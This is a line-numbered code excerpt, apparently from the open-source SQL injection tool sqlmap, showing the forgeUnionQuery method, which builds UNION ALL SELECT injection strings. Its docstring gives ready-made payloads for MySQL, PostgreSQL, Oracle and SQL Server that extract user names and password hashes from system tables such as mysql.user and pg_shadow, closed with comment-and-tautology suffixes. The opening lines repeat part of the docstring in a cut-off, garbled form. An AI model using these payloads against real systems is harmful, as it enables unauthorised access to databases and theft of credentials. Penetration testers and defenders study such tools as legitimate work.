Take in input an query (pseudo query) string and return its processed UNION ALL SELECT query. Examples: MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR
(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None)
| 823 | return concatenatedQuery |
| 824 | |
| 825 | def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None): |
| 826 | """ |
| 827 | Take in input an query (pseudo query) string and return its |
| 828 | processed UNION ALL SELECT query. |
| 829 | |
| 830 | Examples: |
| 831 | |
| 832 | MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user |
| 833 | MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488 |
| 834 | |
| 835 | PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow |
| 836 | PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713 |
| 837 | |
| 838 | Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83)) |
| 839 | Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738 |
| 840 | |
| 841 | Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins |
| 842 | Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254 |
| 843 | |
| 844 | @param query: it is a processed query string unescaped to be |
| 845 | forged within an UNION ALL SELECT statement |
| 846 | @type query: C{str} |
| 847 | |
| 848 | @param position: it is the NULL position where it is possible |
| 849 | to inject the query |
| 850 | @type position: C{int} |
| 851 | |
| 852 | @return: UNION ALL SELECT query string forged |
| 853 | @rtype: C{str} |
| 854 | """ |
| 855 | |
| 856 | if conf.uFrom: |
| 857 | fromTable = " FROM %s" % conf.uFrom |
| 858 | elif not fromTable: |
| 859 | if kb.tableFrom: |
| 860 | fromTable = " FROM %s" % kb.tableFrom |
| 861 | else: |
| 862 | fromTable = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "") |
| 863 | |
| 864 | if query.startswith("SELECT "): |
| 865 | query = query[len("SELECT "):] |
| 866 | |
| 867 | unionQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix) |
| 868 | |
| 869 | if limited: |
| 870 | unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) |
| 871 | unionQuery += fromTable |
| 872 | unionQuery = self.suffixQuery(unionQuery, comment, suffix) |
| 873 | |
| 874 | return unionQuery |
| 875 | else: |
| 876 | _ = zeroDepthSearch(query, " FROM ") |
| 877 | if _: |
| 878 | fromTable = query[_[0]:] |
| 879 | |
| 880 | if fromTable and query.endswith(fromTable): |
| 881 | query = query[:-len(fromTable)] |
| 882 |